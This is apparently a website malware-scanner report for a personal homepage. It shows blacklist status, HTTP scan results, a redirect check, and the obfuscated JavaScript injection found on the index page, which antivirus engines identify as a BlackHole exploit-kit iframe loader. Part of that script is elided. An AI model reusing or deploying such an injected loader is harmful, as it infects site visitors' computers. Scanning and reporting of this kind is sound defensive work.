New scan:

Malware Scanner report for photontecberlin.homepage.t-online.de

Malicious/Suspicious/Total urls checked
1/0/2
1 page has malicious code. See details below
Blacklists
Found
The website is marked by Google as suspicious.

The website "photontecberlin.homepage.t-online.de" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=photontecberlin.homepage.t-online.de

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

RequestServer responseStatus
http://photontecberlin.homepage.t-online.de/
200 OK
Content-Length: 5742
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

z="y";vz="d"+"o"+"c"+"ument";try{+function(){if(document.querySelector)++(window[vz].body)==null}()}catch(q){aa=function(ff){ff="fr"+"omCh"+ff;for(i=0;i<z.length;i++){za+=String[ff](e(v+(z[i]))-(13));}};};e=(eval);v="0x";a=0;try{;}catch(zz){a=1}if(!a){try{++e(vz)["\x62o"+"d"+z]}catch(q){a2="^";}z="2d^73^82^7b^70^81^76^7c^7b^2d^71^78^87^3d^46^35^36^2d^88^1a^17^2d^83^6e^7f^2d^80^81^6e^81^76^70^4a^34^6e^77^6e^85^34^48^1a^17^2d^83^6e^7f^2d^70^7c^7b^81^7f^7c^79^79^72^7f^4a^34^76^7b^71^72^85^3b^7d^
... 3527 bytes are skipped ...
^7f^76^7b^74^35^2d^79^72^7b^39^2d^72^7b^71^2d^36^2d^36^48^1a^17^8a^1a^17^76^73^2d^35^7b^6e^83^76^74^6e^81^7c^7f^3b^70^7c^7c^78^76^72^52^7b^6e^6f^79^72^71^36^1a^17^88^1a^17^76^73^35^54^72^81^50^7c^7c^78^76^72^35^34^83^76^80^76^81^72^71^6c^82^7e^34^36^4a^4a^42^42^36^88^8a^72^79^80^72^88^60^72^81^50^7c^7c^78^76^72^35^34^83^76^80^76^81^72^71^6c^82^7e^34^39^2d^34^42^42^34^39^2d^34^3e^34^39^2d^34^3c^34^36^48^1a^17^1a^17^71^78^87^3d^46^35^36^48^1a^17^8a^1a^17^8a".split(a2);za="";aa("arCode");e(""+za);}

Antivirus reports:

AntiVir
JS/Blacole.EH.1
Avast
JS:Decode-BFW [Trj]
nProtect
JS:Exploit.BlackHole.BN
Emsisoft
JS:Exploit.BlackHole.BN (B)
Comodo
TrojWare.JS.iFrame.D
McAfee-GW-Edition
JS/Exploit-Blacole.gc
DrWeb
JS.IFrame.500
Kaspersky
Trojan-Downloader.JS.Expack.ajr
Microsoft
Exploit:JS/Blacole.OC
MicroWorld-eScan
JS:Exploit.BlackHole.BN
Fortinet
JS/Kryptik.HOL!tr
McAfee
JS/Exploit-Blacole.gc
NANO-Antivirus
Trojan.Script.Expack.chwlwn
F-Secure
JS:Exploit.BlackHole.BN
AVG
Script/Exploit.Kit
Norman
Blacole.WU
GData
JS:Exploit.BlackHole.BN
BitDefender
JS:Exploit.BlackHole.BN

http://photontecberlin.homepage.t-online.de/test404page.js
404 Not Found
Content-Length: 212
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: photontecberlin.homepage.t-online.de

Result:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 01 Mar 2015 22:43:08 GMT
Accept-Ranges: bytes
ETag: "15eea85-166e-4e47af5cf7700"
Server: CM4all Webserver
Vary: user-agent,cookie2,cookie2
Content-Length: 5742
Content-Type: text/html
Last-Modified: Wed, 21 Aug 2013 20:24:28 GMT
X-Ua-Compatible: chrome=1
X-Ua-Compatible: chrome=1

...5742 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: photontecberlin.homepage.t-online.de
Referer: http://www.google.com/search?q=photontecberlin.homepage.t-online.de

Result:
The result is similar to the first query. There are no suspicious redirects found.